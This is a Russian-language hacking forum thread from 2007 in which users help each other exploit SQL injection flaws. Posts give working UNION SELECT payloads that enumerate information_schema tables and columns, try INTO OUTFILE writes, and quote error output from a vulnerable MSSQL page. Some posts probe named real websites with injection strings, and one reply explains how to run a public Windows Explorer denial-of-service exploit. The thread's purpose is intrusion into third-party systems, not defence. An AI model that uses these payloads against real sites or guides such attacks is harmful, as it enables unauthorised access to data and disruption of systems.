 |
|
08.08.2007, 00:32
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
Работа с MySQL версии 5.0.27.
Делаю такой запрос
-4+union+select+1111,TABLE_NAME,3333,4444,5555,6666 ,7777,8888+from+information_schema.tables+limit+5, 1/*.html
Все работает. Как я понимаю выводит название одной из таблиц которые есть в базе.
Нахожу нужную таблицу через лимит.
Составляю запрос
-4+union+select+1111,COLUMN_NAME,3333,4444,5555,666 6,7777,8888+from+information_schema.COLUMNS+WHERE+ TABLE_NAME='wifi_points'/*.html
Где 'wifi_points'имя таблицы полученое из предидущего запроса.
Выводиться имя столбика - "id"
Дальше пытаюсь вытянуть данные таким запросом
-4+union+select+1111,id,3333,4444,5555,6666,7777,88 88+from+wifi_points/*.html
выдает пустоту так как будто запрос неверный. Пробовал подставлять лимит 1,1 и 0,1 нифига.
Пробую
-4+union+select+1111,2222,3333,4444,5555,6666,7777, 8888+from+wifi_points/*.html
Т.е. проверяю есть ли такая таблица - тоже пусто.
В итоге могу узнать полностью структуру базы но данные не могу вывести.
Что не так? Может есть хитрости при работе с MySQL версии 5.0.27.
Как правильно строить запрос ведь скуль есть, а результата нет? |
|
|
08.08.2007, 01:29
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
С нами:
10223973
Репутация:
123
|
|
Значит твоему пользователю закрыт доступ, такое тногда бывает, через системные таблицы видишь, а вывести не можешь((((
|
|
|
|
08.08.2007, 12:24
|
|
Познающий
Регистрация: 05.08.2007
Сообщений: 30
С нами:
9876886
Репутация:
18
|
|
Возможно эта таблица находится в другой базе, можно посмотреть запросом
1,2,schema_name,4+from+infotmation_schema.schemata/*
Выведет все существующие базы
и если не ошибаюсь можно выдернуть интересную связку
schema_name,table_name,column_name+from+informatio n_schema.columns/*
Я уверен что в таблице columns есть column_name и table_name, но насчет schema_name не уверен, но по-моему она там была. |
|
|
|
08.08.2007, 12:30
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
С нами:
10088966
Репутация:
646
|
|
Попробуй
Код:
-4+union+select+1111,table _schema,3333,4444,5555,6666 ,7777,8888+from+information_schema.tables+where+table_name='wifi_points'/*.html
|
|
|
|
08.08.2007, 20:11
|
|
Новичок
Регистрация: 07.08.2007
Сообщений: 4
С нами:
9874580
Репутация:
0
|
|
Здравствуйте, мне нужна ваша помощь.
На уязвимой странице происходит передача параметра без фильтрации, он есть особенность- значения полей не выводятся на странице, а на основе данных рисуется карта (это не важно, т.к в базе нет паролей). Я пытаюсь сделать вывод в файл с помощью INTO OUTFILE , но получаю ошибку.
Я отправляю
?id=1122+UNION+SELECT+1,2+FROM+locations+INTO+OUTF ILE+'name'
(OUTFILE я пишу одним словом, без пробела Ж)
Выдает такое
Код:
Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near the keyword 'INTO'. (severity 15) in E:\XAMPPLITE\htdocs\info\pages\map.php on line 7
Warning: mssql_query() [function.mssql-query]: Query failed in E:\XAMPPLITE\htdocs\info\pages\map.php on line 7
Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource in E:\XAMPPLITE\htdocs\info\pages\map.php on line 8
А если запрос такой
?id=1122+UNION+SELECT+1,2+FROM+locations
всё нормально, без ошибок
PHP скрипт там такой
PHP код:
$result = mssql_query("SELECT *
FROM locations
WHERE id = $id;");
Со скриптом возможна неточность (врядли), тк на сервере стоит немного другая версия.
Всё вроде бы очень просто, но я не пойму что это за неправильный синтаксис возле INTO... Помогите разобраться |
|
|
|
09.08.2007, 08:15
|
|
Познающий
Регистрация: 05.08.2007
Сообщений: 30
С нами:
9876886
Репутация:
18
|
|
ээм, а может быть в MSSQL немнога другие запросы поэтому и в into возникает неправильный синтаксис... Все же я не уверен, это всего лишь предположение, за неправильность не бить =)
|
|
|
|
10.08.2007, 10:59
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
С нами:
10088966
Репутация:
646
|
|
http://e-catalog.rusbiz.ru/1'+and+'1'='1.html
В чем косяк? Запрос вроде правильный, но не проходит. Подозреваю, глюк с плюсами... пробовал /**/, не канает  |
|
|
|
10.08.2007, 11:49
|
|
Новичок
Регистрация: 12.05.2007
Сообщений: 1
С нами:
9999671
Репутация:
0
|
|
Не знаю правильно ли я выбрал раздел.
Народ вот есть эксплоит
MS Windows Explorer.exe Gif Image Denial of Service Exploit
http://www.milw0rm.com/exploits/4215
Его вроде компилировать на перле. Но не понел как его использовать. Помоги как его использовать.
|
|
|
|
10.08.2007, 12:09
|
|
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
С нами:
10356158
Репутация:
16
|
|
вот попробовал вбить такое http://www.olympic.org/uk/news/olympic_news/full_story_uk.asp?id=2272' и выдает как видно ошибку ....
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'cint'
/common/asp/inc_news.asp, line 634
хотя сами могли увидеть.... так вот... что мона сделать дальше?? )) или еще конкретней как заюзать все это... что применить?? ) заранее благодарю... )
|
|
|
|
10.08.2007, 12:50
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами:
10160966
Репутация:
1719
|
|
Сообщение от infium
Не знаю правильно ли я выбрал раздел.
Народ вот есть эксплоит
MS Windows Explorer.exe Gif Image Denial of Service Exploit
http://www.milw0rm.com/exploits/4215
Его вроде компилировать на перле. Но не понел как его использовать. Помоги как его использовать.
Перл-сплоиты не компилируются, а интерпретируются (выполняются)
Установи Active Perl (use g00gle 4 searching)
Далее...
1. если сплоит с ГУИ (с графич. интерфейс), просто кликни по нему пару раз
2. если сплоит консольный, запускаешь cmd.exe, переходишь в каталог со сплоитом и запускаешь его, предварительно прочитав в хелпе, за что какой аргумент отвечает.
пс: данная тема не раз обсуждалась, если все еще непонятно - юзай поиск.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
